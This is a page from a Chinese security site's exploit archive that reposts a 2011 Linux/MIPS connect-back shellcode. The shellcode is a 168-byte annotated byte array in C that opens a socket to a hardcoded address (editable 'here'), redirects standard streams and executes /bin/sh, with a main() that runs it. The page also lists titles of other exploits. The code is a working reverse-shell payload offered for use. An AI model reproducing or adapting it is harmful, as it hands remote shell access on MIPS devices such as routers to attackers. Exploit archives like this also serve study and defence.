首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
来源:imrigan [sobachka] gmail.com 作者:rigan 发布时间:2011-12-12  

/*
 * Title: Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
 * Author: rigan - imrigan [sobachka] gmail.com
 */

#include <stdio.h>

char sc[] =
         "\x24\x0f\xff\xfd"        // li      t7,-3
         "\x01\xe0\x20\x27"        // nor     a0,t7,zero
         "\x01\xe0\x28\x27"        // nor     a1,t7,zero
         "\x28\x06\xff\xff"        // slti    a2,zero,-1
         "\x24\x02\x10\x57"        // li      v0,4183 ( sys_socket )
         "\x01\x01\x01\x0c"        // syscall 0x40404
 
         "\xaf\xa2\xff\xff"        // sw      v0,-1(sp)
         "\x8f\xa4\xff\xff"        // lw      a0,-1(sp)
         "\x24\x0f\xff\xfd"        // li      t7,-3 ( sa_family = AF_INET )
         "\x01\xe0\x78\x27"        // nor     t7,t7,zero
         "\xaf\xaf\xff\xe0"        // sw      t7,-32(sp)
         "\x3c\x0e\x7a\x69"        // lui     t6,0x7a69 ( sin_port = 0x7a69 )
         "\x35\xce\x7a\x69"        // ori     t6,t6,0x7a69
         "\xaf\xae\xff\xe4"        // sw      t6,-28(sp)
        
      /* ====================  You can change ip here ;) ====================== */
         "\x3c\x0d\xc0\xa8"        // lui     t5,0xc0a8 ( sin_addr = 0xc0a8 ...
         "\x35\xad\x01\x64"        // ori     t5,t5,0x164           ...0164 )
      /* ====================================================================== */
     
         "\xaf\xad\xff\xe6"        // sw      t5,-26(sp)
         "\x23\xa5\xff\xe2"        // addi    a1,sp,-30
         "\x24\x0c\xff\xef"        // li      t4,-17 ( addrlen = 16 )    
         "\x01\x80\x30\x27"        // nor     a2,t4,zero
         "\x24\x02\x10\x4a"        // li      v0,4170 ( sys_connect )
         "\x01\x01\x01\x0c"        // syscall 0x40404
 
         "\x24\x0f\xff\xfd"        // li      t7,-3
         "\x01\xe0\x28\x27"        // nor     a1,t7,zero
         "\x8f\xa4\xff\xff"        // lw      a0,-1(sp)
//dup2_loop:
         "\x24\x02\x0f\xdf"        // li      v0,4063 ( sys_dup2 )
         "\x01\x01\x01\x0c"        // syscall 0x40404
         "\x20\xa5\xff\xff"        // addi    a1,a1,-1
         "\x24\x01\xff\xff"        // li      at,-1
         "\x14\xa1\xff\xfb"        // bne     a1,at, dup2_loop
 
         "\x28\x06\xff\xff"        // slti    a2,zero,-1
         "\x3c\x0f\x2f\x2f"        // lui     t7,0x2f2f
         "\x35\xef\x62\x69"        // ori     t7,t7,0x6269
         "\xaf\xaf\xff\xf4"        // sw      t7,-12(sp)
         "\x3c\x0e\x6e\x2f"        // lui     t6,0x6e2f
         "\x35\xce\x73\x68"        // ori     t6,t6,0x7368
         "\xaf\xae\xff\xf8"        // sw      t6,-8(sp)
         "\xaf\xa0\xff\xfc"        // sw      zero,-4(sp)
         "\x27\xa4\xff\xf4"        // addiu   a0,sp,-12
         "\x28\x05\xff\xff"        // slti    a1,zero,-1
         "\x24\x02\x0f\xab"        // li      v0,4011 ( sys_execve )
         "\x01\x01\x01\x0c";       // syscall 0x40404
        
void main(void)
{
      
       void(*s)(void);
       printf("size: %d\n", sizeof(sc));
       s = sc;
       s();
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CSF Firewall Buffer Overflow
·Linux/MIPS - reboot() - 32 byt
·Docebo LMS <= v4.0.4 (messages
·Acpid 1:2.0.10-1ubuntu2 Privil
·Free Opener Local Denial of Se
·zFTPServer Suite 6.0.0.52 'rmd
·Apache HTTP Server Denial of S
·HP Easy Printer Care XMLCacheM
·CyberLink Multiple Products Fi
·Sysax Multi Server 5.50 Create
·DedeCMS 5.7圈子XSS跨站可拿WebS
·HP Diagnostics Server magentse
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved